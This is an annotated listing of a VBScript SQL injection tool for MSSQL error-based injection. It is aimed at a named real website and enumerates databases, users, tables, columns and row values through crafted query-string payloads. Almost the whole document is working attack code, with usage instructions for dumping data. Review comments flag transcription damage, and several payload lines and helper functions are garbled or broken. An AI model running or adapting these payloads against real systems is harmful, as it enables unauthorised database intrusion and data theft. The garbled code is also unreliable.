Author: tr4c3
To keep the script general-purpose, the `and (select col_name(object_id('tablename'), N))=0` form is not used.
' To handle Korean characters in responses, modify lines 121 or 136; other settings can be adjusted as needed.
' More features are welcome; contributions invited.
' --- Configuration and argument handling ---------------------------------
' NOTE(review): several lines in this listing lost their comment apostrophe
' in transcription, so English commentary trails the code; they are left as
' printed.
' HTTP verb used by Sqlinj ("Get" or "Post"; Sqlinj compares it case-insensitively).
Const methods = "Get" Submit method please modify here, there is got and post optional
' Output sink used by Resut: "S" appends to Result.txt, "D" echoes to the console.
Const DisPlay = "D" ' S saved to file, D output to screen
' Script-level state. i and k are enumeration counters shared by the loops
' below (i is also reused as the loop index inside Bytes2bstr); STRD receives
' the value Sqlinj extracts from the last response ("" when nothing was found).
Dim Strurl_b, strURL, I, K, myarray, Strarg, STRD
' Base request: URL plus the original query string. Sqlinj appends each
' payload to the query string, so the injectable parameter must be last here.
Strurl_b = "Http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120 '" is based on the uncertainty of the injection point, please manually change here
' i starts at 1 because db_name(N) is probed from N = 1 upward. The leading
' "Cardinality of" is a translation artifact of the original comment.
Cardinality of i = 1 ' database counter
k = 0 ' counter for tables, columns and row values
' Split the base request at "?": element 0 is the URL, element 1 the query string.
MyArray = Split (Strurl_b, "?",-1, 1)
strURL = myarray (0) ' request URL without query string
Strarg = myarray (1) ' original query string; payloads are appended to it
' With no command-line arguments, print usage and exit (Showu calls Quit).
Set Args = wscript.arguments
If args.count = 0 Then
Showu
End If
' If args.count =1 and LCase (Args (0))
'************************************************************************
' One argument: "databases" enumerates database names, "info" prints the
' current database, login user and system user.
'************************************************************************
If Args.count =1 Then
' Probe db_name(i) for i = 1, 2, ... until Sqlinj leaves strd empty
' (no value found in the response). Each hit is printed by Sqlinj.
If LCase (Trim (Args (0)) = "Databases" Then
Resut ("---------------===============================--------------")
Resut ("All the DataBases:")
Todo
' Payload appended to the query string; Sqlinj then looks for the
' '[ ... ] fragment of the server's error text to pull the name out.
Strdata = "and QuoteName (db_name (" &i& ")) =0--"
Sqlinj (strdata)
i = i + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
' Three single probes: current database, database user, system user.
ElseIf LCase (Trim (Args (0)) = "Info" Then
Resut ("---------------===============================--------------")
Resut ("The current Database is:")
Strdata = "and QuoteName (Db_name ()) =0--"
Sqlinj (strdata)
Resut ("---------------===============================--------------")
Resut ("The Database User is:")
Strdata = "and QuoteName (user) =0--"
Sqlinj (strdata)
Resut ("---------------===============================--------------")
Resut ("The System_user is:")
Strdata = "and QuoteName (system_user) =0--"
Sqlinj (strdata)
Resut ("---------------===============================--------------")
Wscript.Quit
End If
End If
'************************************************************************
' Two arguments (<database> tables): enumerate user tables of <database>
' from its dbo.sysobjects (xtype = char(85), i.e. 'U').
'************************************************************************
If args.count=2 and LCase (Trim (Args (1)) = "Tables" Then
Resut ("---------------===============================--------------")
Resut ("The Tables of" & Args (0))
Todo
' k-th table: "top 1 ... not in (select top k ...)". The payload as printed
' is garbled by transcription (quote placement, "char (?)"); left as is.
Strdata = "and" (select top 1 quotename (name) from "& Args (0) &". Dbo.sysobjects where Xtype=char (?) and name not In (select Top & k & "name from" &args (0) & ". Dbo.sysobjects where Xtype=char (85))) =0--"
Sqlinj (strdata)
K = k + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' Three arguments (<database> <table> cols): enumerate the columns of
' <database>.dbo.<table> from <database>.dbo.syscolumns via object_id().
'************************************************************************
If args.count=3 and LCase (Trim (Args (2)) = "Cols" Then
Database = Args (0)
Table = Args (1)
' Fully qualified table name and the syscolumns view of the same database.
TarGet = DataBase & ". dbo." & Table
Targetcol = Database & ". Dbo. Syscolumns "
Resut ("---------------===============================--------------")
Resut ("The Columns of" & TarGet)
Todo
' k-th column name, same top-1 / not-in pattern as the table loop.
' Quoting in this line is garbled by transcription; left as printed.
Strdata = "and" (select top 1 quotename (name) from "& Targetcol &" Where id=object_id (' & TarGet & "') and Name not in (select top &k& name from "& Targetcol &" Where id=object_id (' & TarGet & ')) =0--"
Sqlinj (strdata)
K = k + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' Four arguments (<database> <table> <column> values): enumerate the
' values of one column of <database>.dbo.<table>, one row per request.
'************************************************************************
If args.count=4 and LCase (Trim (Args (3)) = "Values" Then
Database = Args (0)
Table = Args (1)
Col = Args (2)
Target = Database & ". dbo." & Table
Resut ("---------------===============================--------------")
Resut ("The Values of" & Args (2) & "in" &target)
Todo
' k-th value of Col. The "not in" between the column and the subselect is
' missing as printed ("Sele CT" is also split) - transcription damage.
Strdata = "and (select top 1 quotename (" & Col & ") from" & Target & "where" & Col & "(Sele CT Top "& K &" "& Col &" from "& Target &") =0--"
Sqlinj (strdata)
K = k + 1
Loop Until strd= ""
Resut ("---------------===============================--------------")
Wscript.Quit
End If
' Sqlinj - sends one request with `value` appended to the original query
' string and extracts the text between "'[" and "]" from the response body
' into the script-level STRD (set to "" when that pattern is absent).
'   value : payload fragment (modified in place: the original query string
'           strarg is prepended).
' Side effects: writes STRD, prints "|_<value>" through Resut on a hit.
' For log review, the request shape is: the base URL with the payload in the
' query string (GET) or body (POST), and a Referer equal to the base URL.
Sub Sqlinj (value)
' NOTE(review): the quotes around Get are single quotes as printed; the
' POST branch below shows the intended comparison form.
If UCase (method) = ' Get ' Then
Value = strarg & Value
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
' Synchronous request (async = False); the payload travels in the query string.
Objxml.open "Get", strURL & "?" & Value, False
Objxml.setrequestheader "Referer", strURL
' Objxml.setrequestheader ' accept-language ', ' euc-kr '
Objxml.send ()
Strrevs = Objxml.responsetext ' default with this
' Strrevs = bytes2bstr (objxml.responsebody) ' alternative for Korean (double-byte) pages
' A hit is the error text fragment "'[ ... ]"; Mid() cuts out what is
' between the two markers (offset +2 skips the two marker characters).
If InStr (Strrevs, "' [") <>0 and InStr (Strrevs, "]") <>0 Then
STRD = Mid (Strrevs,instr (Strrevs, "' [") +2, InStr (Strrevs, "]")-InStr (Strrevs, "' [")-2)
Resut ("|_" &STRD)
Else
STRD = ""
End If
' POST variant: same payload, form-encoded in the body via UrlEncode.
ElseIf UCase (method) = "POST" Then
Value = strarg & Value
Set Objxml = CreateObject ("Microsoft.XMLHTTP")
Objxml.open "POST", strURL, False
Objxml.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Objxml.setrequestheader "Referer", strURL
Objxml.send (UrlEncode (value))
Strrevs = Objxml.responsetext ' default with this
' Strrevs = bytes2bstr (objxml.responsebody) ' alternative for Korean (double-byte) pages
' Same response parsing as the GET branch.
If InStr (Strrevs, "' [") <>0 and InStr (Strrevs, "]") <>0 Then
STRD = Mid (Strrevs,instr (Strrevs, "' [") +2, InStr (Strrevs, "]")-InStr (Strrevs, "' [")-2)
Resut ("|_" &STRD)
Else
STRD = ""
End If
End If
End Sub
' Resut - writes one line of output according to the DisPlay constant.
'   Strinfo : text to emit.
' "S": append Strinfo to Result.txt in the current directory (OpenTextFile
' mode 8 = append, create = True). "D": echo to the console. Any other
' value of DisPlay discards the line. Declared as a Function but assigns
' no return value.
Function Resut (Strinfo)
If UCase (DisPlay) = "S" Then
Set fso = CreateObject ("Scripting.FileSystemObject")
Set FSO1 = fso. OpenTextFile ("Result.txt", 8,true)
Fso1. WriteLine (Strinfo)
Fso1. Close
Set FSO = Nothing
ElseIf UCase (DisPlay) = "D" Then
WScript.Echo (Strinfo)
End If
End Function
' UrlEncode - minimal form-encoding step used by the POST branch of Sqlinj;
' it is a single Replace, not a full URL encoder. As printed the search
' string is empty (probably a lost space in transcription), in which case
' VBScript's Replace returns str unchanged.
Function UrlEncode (str)
str = Replace (str, "", "+")
UrlEncode = str
End Function
' Bytes2bstr - converts a byte string (e.g. responseBody) to a VBScript
' string. Bytes below &h80 map one-to-one through Chr; a byte at or above
' &h80 is combined with the following byte as a double-byte character code
' (first * &h100 + second) and the second byte is skipped.
'   vIn : byte string (LenB/MidB/AscB are used, so this expects binary data).
' Returns the decoded string. Uses the script-level variable i as its loop
' index (no local Dim), so it clobbers i for the caller.
' NOTE(review): how Chr renders codes above &hFF depends on the system code
' page - presumably a Korean locale is assumed here; confirm before relying on it.
Function Bytes2bstr (vIn)
Strreturn = ""
For i = 1 to LenB (vIn)
Thischarcode = AscB (MidB (vin,i,1))
If Thischarcode < &h80 Then
Strreturn = Strreturn & Chr (Thischarcode)
Else
' Lead byte: pair it with the next byte and advance past it.
Nextcharcode = AscB (MidB (vin,i+1,1))
Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode))
i = i + 1
End If
Next
Bytes2bstr = Strreturn
End Function
' Showu - prints the usage banner to the console and terminates the script
' via WScript.Quit (so it never returns to the caller).
' The ". Echo" / "(\"cscript\"). scriptname&" forms are transcription
' damage of WScript.Echo / WScript.ScriptName; left as printed.
Sub Showu ()
With Wscript
. Echo ("+--------------------------=====================------------------------------+")
. Echo ("Sql2005 injection Auxiliary script (rough version), for MSSQL error mode by tr4c3[at]126[dot]com")
. Echo ("Usage:")
. Echo ("cscript"). scriptname& "info--explosion basic Information")
. Echo ("cscript"). scriptname& "databases--all the Library names")
. Echo ("cscript"). scriptname& "Pubs tables--, pubs, all user table names")
. Echo ("cscript"). scriptname& "Pubs authors cols--, pubs, Authors table, all field names")
. Echo ("cscript"). scriptname& "pubs authors au_id values--pubs.dbo.authors in Blast au_id")
. Echo ("+--------------------------=====================------------------------------+")
. Quit
End With
End Sub